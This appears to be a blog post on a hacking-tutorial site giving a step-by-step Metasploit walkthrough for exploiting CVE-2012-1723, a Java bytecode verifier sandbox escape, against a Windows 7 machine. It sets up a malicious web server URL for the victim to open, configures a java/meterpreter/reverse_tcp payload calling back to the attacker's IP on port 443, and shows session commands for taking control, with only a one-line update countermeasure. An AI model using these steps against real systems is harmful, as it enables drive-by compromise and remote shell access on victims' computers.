Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Bookmark

Type : Tutorial

Level : Medium

Victim O.S : Windows 7 Ultimate

Attacker O.S : Backtrack 5 R2 with Metasploit Framework v4

CVE : 2012-1723

Credits :    Stefan Cornellius,     # Discoverer
mihi,                  # Vuln analysis
littlelightlittlefire, # metasploit module
juan vazquez,          # merged code (overlapped)
sinn3r                # merged code (overlapped)

Actually I saw this Java Bytecode Verifier Remote Code Execution exploit about 5-6 days ago on exploit database website. It’s very nice exploit btw ๐Ÿ˜› with Excellent Ranking. Here I copy from the exploit description.

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Btw this Java Bytecode Verifier Remote Code Execution exploit published on July 11, 2012 so it still fresh ๐Ÿ™‚ and the interesting thing was because this is a multi exploit that can affect not only one O.S-es (but I just try only with windows 7). Maybe if you try it with another O.S e.g : linux, mac, etc you can also give your comments here is it work or not.

Requirements :

1. Metasploit Framework with java verifier field access exploit

2. You can download the exploit here http://www.exploit-db.com/exploits/19717/

Step by Step :

Attacker IP Address : 192.168.8.91

Victim IP Address : 192.168.8.90

1. Open your terminal (CTRL+ALT+T) and go to metasploit framework console(msfconsole)

2. Add the Java Bytecode Verifier Remote Code Execution exploit (see image below).

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

3. The next step you need to set up your payload (if your exploit was successfully executed by victim). Because it’s java exploit, so the payload maybe also will use java, but let see the available payload first.

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

From the picture above I use the java/meterpreter/reverse_tcp for the payload.

4. The next step after we successfully set up the payload, we also need to set up the exploit switch options to suit our need. To view the available options you can run show options command (or see picture below).

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Information :

set srvhost 192.168.8.91 --> set the exploit server ip address

set srvport 80 --> set the exploit server port (because this exploit use browser, 
so we will set it to port 80 or the default web server port)

set uripath "" --> I didn’t set up the URI, just use the original IP address instead.

set lhost 192.168.8.91 --> Set the local ip (attacker ip) in case the exploit 
successfully performed and payload will launched to this ip address

set lport 443 --> Set the local port (attacker port), in which port you want to catch 
the connection from victim

exploit --> perform te exploit (run the server and start the payload)

5. If victim open our malicious URL (http://192.168.8.91) on their browser, here are the screenshot :

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

I run sessions -l command to list an active sessions, and I got 1 active sessions there.

6. The last step to interact with the available sessions, we use sessions -i 1 (because the ID was 1). Here are the screenshot when I successfully perform the exploit.

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

pwned…

Countermeasures :

1. Update your JRE to the latest version (update from java was available for this vulnerability).

Hope it’s useful ๐Ÿ™‚

You can subscribe to get updates from this website directly on your e-mail.

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

(Visited 250 times, 1 visits today)

Share this article if you found it was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com